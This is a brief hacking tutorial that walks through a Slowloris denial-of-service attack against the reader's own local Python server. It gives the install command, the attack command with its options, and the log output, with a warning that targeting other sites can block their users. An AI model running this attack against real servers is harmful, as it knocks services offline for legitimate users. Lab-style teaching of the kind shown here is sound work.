GCS Learn
DDoS Attack with Slowlorus
Author - GIGOCYBERSPACE
Republished - 22 October 2024
Slowloris is a powerful tool that works based of on yhe principle of taking server power and processing space. It works by sending partial(incomplete) request packets to the server. The incomplete continuous packet stream draws up the server processing and makes it unavailable for other legitimate users.There are other techniques of ddos attack like the Bandwidth ddos where the server bandwidth is being drawn up.
But in a advance sense, this is how Slowloris work:
- When you perform a ddos attack
with Slowloris, it sends partial
(incomplete) packet with a HTTP
request to the server.
- The Connection is kept alive as long as possible to use up server resource.
It continues maybe with random
agent if configure, higher than the
server ability causing a heavy
botnet traffic making it unavailable
to users
For easier understanding, just look at the diagram:
So now, we are going to perform a dddos attack. But we are going to do that by installation using pip in python 3
Install the repository
We would have install the repository from GitHub, bit in this tutorial we will install Slowloris using python3 pip command
pip3 install slowloris
Collecting slowloris
Downloading Slowloris-0.2.5-py3
none-any.whl (4.6 kB)
Installing collected packages:
slowloris
Successfully installed slowloris-
0.2.5
This is the tool we will use to do the ddos attack. We will start up a simple local server and we target the incomplete request towards ourselves.
Start your local Server
For this tutorial, we going to be using python HTTP module to start up a local server.
python3 -m http.server 8080
Serving HTTP on :: port 8080 (http://[::]:8080/) ...
This server active and running is the sever we're going to perform the dddos. We can use any website or server, but it is at your own risk. Become this can stop people from reaching the website. So the best source is your server, for a ethical hacker.
DDoS Attack
This is the part where slowloris we use Slowloris to send incomplete request to the server. To make it unavailable:
slowloris localhost -p 8080 -s 250
[07-01-2023 19:09:59] Attacking localhost with
250 sockets.
[07-01-2023 19:09:59] Creating sockets...
[07-01-2023 19:10:00] Sending keep-alive headers...
[07-01-2023 19:10:00] Socket count: 250
[07-01-2023 19:10:15] Sending keep-alive headers...
[07-01-2023 19:10:15] Socket count: 250
[07-01-2023 19:10:30] Sending keep-alive headers...
[07-01-2023 19:10:30] Socket count: 250
...
Where localhost is the client we are attacking, -p 8080 is the port number and -s 250 is the number of sockets of request
And we see the result:
We use only essential cookies to ensure the proper functionality of our website. By continuing to use our site, you accept the use of these cookies.
©GIGOCYBERSPACE 2022 -
